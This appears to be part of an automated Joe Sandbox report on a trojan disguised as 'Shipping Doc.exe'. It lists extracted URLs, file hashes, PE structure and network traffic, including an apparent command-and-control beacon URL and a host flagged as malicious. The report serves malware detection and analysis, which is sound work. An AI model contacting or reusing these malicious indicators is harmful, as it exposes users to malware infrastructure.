                        		unknown
                        http://www.jiyu-kobo.co.jp/8Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comlicdShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.founder.com.cn/cnyShipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fonts.comicVShipping Doc.exe, 00000002.00000003.213525769.000000000579B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/0Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.ascendercorp.com/typedesigners.htmlShipping Doc.exe, 00000002.00000003.218505402.00000000057C6000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fonts.comexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          		high
                          http://www.sandoll.co.krexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comcShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.urwpp.deShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmp, Shipping Doc.exe, 00000002.00000003.218511303.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/Y0aShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sajatypeworks.coma7Shipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.founder.com.cn/cndShipping Doc.exe, 00000002.00000003.215912066.000000000578E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/UShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlCcscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/nShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/qShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnzShipping Doc.exe, 00000002.00000003.215964486.0000000000E0D000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/BShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comdShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/;Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/Shipping Doc.exe, 00000002.00000003.216788502.0000000005786000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cnShipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlShipping Doc.exe, 00000002.00000003.219469628.0000000005799000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/Y0/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn8Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn4Shipping Doc.exe, 00000002.00000003.216206775.0000000005787000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/dShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn&Shipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/Shipping Doc.exe, 00000002.00000003.219138017.00000000057BE000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/en-utShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      34.102.136.180
                                      		davinescosmetics.comUnited States
                                      		15169GOOGLEUSfalse
                                      208.113.204.236
                                      		www.bigdaddy.fishUnited States
                                      		26347DREAMHOST-ASUStrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:458885
                                      Start date:03.08.2021
                                      Start time:20:39:22
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 42s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:Shipping Doc.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/1@2/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 67.2% (good quality ratio 62.1%)
                                      • Quality average: 69.6%
                                      • Quality standard deviation: 31.4%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 13.88.21.125, 23.211.4.86, 20.82.210.154, 173.222.108.226, 173.222.108.210, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6
                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      20:40:34API Interceptor1x Sleep call for process: Shipping Doc.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      DREAMHOST-ASUSORDER_0009_PDF.exeGet hashmaliciousBrowse
                                      • 69.163.167.176
                                      A77HHPWkxJ.dllGet hashmaliciousBrowse
                                      • 208.113.160.88
                                      YaRh8PG41y.exeGet hashmaliciousBrowse
                                      • 69.163.228.182
                                      uw01Qp8GcO.exeGet hashmaliciousBrowse
                                      • 69.163.228.182
                                      PAYMENT_COPY.exeGet hashmaliciousBrowse
                                      • 69.163.224.143
                                      Order-CNS Amura Precision Co., Ltd 9A210118KR.exeGet hashmaliciousBrowse
                                      • 69.163.224.174
                                      USD980950_Swift.exeGet hashmaliciousBrowse
                                      • 173.236.228.194
                                      Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                      • 69.163.224.174
                                      HSBCpaymentSlipPDF.exeGet hashmaliciousBrowse
                                      • 69.163.226.116
                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                      • 75.119.198.195
                                      Order_1537-25.exeGet hashmaliciousBrowse
                                      • 208.113.197.232
                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      INS 0966828.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      Order 2522592.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      INS 0966828.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      Order 2522592.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      INS 53614716.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      WO 2825876.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83
                                      INS 53614716.xlsbGet hashmaliciousBrowse
                                      • 64.111.126.83

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log
                                      Process:C:\Users\user\Desktop\Shipping Doc.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.195385958745407
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      File name:Shipping Doc.exe
                                      File size:1037312
                                      MD5:159d560ff64cdb2d130b1635f4123a49
                                      SHA1:5762036dd01f8a63ce29557c5c0464360500c7e6
                                      SHA256:065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
                                      SHA512:be415739b37b83d24c0d097680ddc2450be5de89f0b844c4b9790c039626f79ffac32f006b9c0febe37c84c519c703c65e03d2648c836b1f0dcd404c0026c4a6
                                      SSDEEP:24576:XB8ns9/deerxEjxbzXDusP8z5y8dWImtw:X4TuDcDImC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..............................~.... ........@.. .......................@............@................................

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x4fe87e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xfe8300x4b.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x5d8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xfc8840xfca00False0.696450937036data7.2014231354IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0x1000000x5d80x600False0.4296875data4.13984531351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1020000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0x1000a00x34cdata
                                      RT_MANIFEST0x1003ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      Translation0x0000 0x04b0
                                      LegalCopyrightCopyright 2019
                                      Assembly Version1.0.0.0
                                      InternalNameRemotingSurroga.exe
                                      FileVersion1.0.0.0
                                      CompanyName
                                      LegalTrademarks
                                      Comments
                                      ProductNameControlLibrary
                                      ProductVersion1.0.0.0
                                      FileDescriptionControlLibrary
                                      OriginalFilenameRemotingSurroga.exe

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      08/03/21-20:42:09.835215TCP1201ATTACK-RESPONSES 403 Forbidden804974434.102.136.180192.168.2.3

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 3, 2021 20:41:49.096541882 CEST4974280192.168.2.3208.113.204.236
                                      Aug 3, 2021 20:41:49.208533049 CEST8049742208.113.204.236192.168.2.3
                                      Aug 3, 2021 20:41:49.208656073 CEST4974280192.168.2.3208.113.204.236
                                      Aug 3, 2021 20:41:49.208802938 CEST4974280192.168.2.3208.113.204.236
                                      Aug 3, 2021 20:41:49.320743084 CEST8049742208.113.204.236192.168.2.3
                                      Aug 3, 2021 20:41:49.321682930 CEST8049742208.113.204.236192.168.2.3
                                      Aug 3, 2021 20:41:49.321881056 CEST8049742208.113.204.236192.168.2.3
                                      Aug 3, 2021 20:41:49.321928024 CEST4974280192.168.2.3208.113.204.236
                                      Aug 3, 2021 20:41:49.321947098 CEST4974280192.168.2.3208.113.204.236
                                      Aug 3, 2021 20:41:49.433867931 CEST8049742208.113.204.236192.168.2.3
                                      Aug 3, 2021 20:42:09.702358007 CEST4974480192.168.2.334.102.136.180
                                      Aug 3, 2021 20:42:09.719989061 CEST804974434.102.136.180192.168.2.3
                                      Aug 3, 2021 20:42:09.720158100 CEST4974480192.168.2.334.102.136.180
                                      Aug 3, 2021 20:42:09.720345020 CEST4974480192.168.2.334.102.136.180
                                      Aug 3, 2021 20:42:09.738079071 CEST804974434.102.136.180192.168.2.3
                                      Aug 3, 2021 20:42:09.835215092 CEST804974434.102.136.180192.168.2.3
                                      Aug 3, 2021 20:42:09.835264921 CEST804974434.102.136.180192.168.2.3
                                      Aug 3, 2021 20:42:09.835561037 CEST4974480192.168.2.334.102.136.180
                                      Aug 3, 2021 20:42:09.835690022 CEST4974480192.168.2.334.102.136.180
                                      Aug 3, 2021 20:42:09.853218079 CEST804974434.102.136.180192.168.2.3

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 3, 2021 20:40:06.545706034 CEST6015253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:06.570727110 CEST53601528.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:07.272217989 CEST5754453192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:07.310528040 CEST53575448.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:08.516273022 CEST5598453192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:08.540811062 CEST53559848.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:09.286916971 CEST6418553192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:09.320760012 CEST53641858.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:10.395097971 CEST6511053192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:10.419987917 CEST53651108.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:11.509215117 CEST5836153192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:11.541548014 CEST53583618.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:12.723732948 CEST6349253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:12.750914097 CEST53634928.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:14.740987062 CEST6083153192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:14.773612022 CEST53608318.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:15.797121048 CEST6010053192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:15.829961061 CEST53601008.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:16.690131903 CEST5319553192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:16.715321064 CEST53531958.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:18.600976944 CEST5014153192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:18.637269974 CEST53501418.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:19.751652002 CEST5302353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:19.786835909 CEST53530238.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:20.660748959 CEST4956353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:20.688199997 CEST53495638.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:21.508096933 CEST5135253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:21.535593987 CEST53513528.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:22.683034897 CEST5934953192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:22.717021942 CEST53593498.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:23.486352921 CEST5708453192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:23.511331081 CEST53570848.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:24.316507101 CEST5882353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:24.343978882 CEST53588238.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:25.550013065 CEST5756853192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:25.578011036 CEST53575688.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:39.483503103 CEST5054053192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:39.524193048 CEST53505408.8.8.8192.168.2.3
                                      Aug 3, 2021 20:40:41.312944889 CEST5436653192.168.2.38.8.8.8
                                      Aug 3, 2021 20:40:41.345688105 CEST53543668.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:00.408565998 CEST5303453192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:00.441035032 CEST53530348.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:02.408351898 CEST5776253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:02.444238901 CEST53577628.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:13.484704971 CEST5543553192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:13.528912067 CEST53554358.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:15.833672047 CEST5071353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:15.875015020 CEST53507138.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:42.797089100 CEST5613253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:42.844923973 CEST53561328.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:43.193022966 CEST5898753192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:43.239955902 CEST53589878.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:48.954216957 CEST5657953192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:49.091502905 CEST53565798.8.8.8192.168.2.3
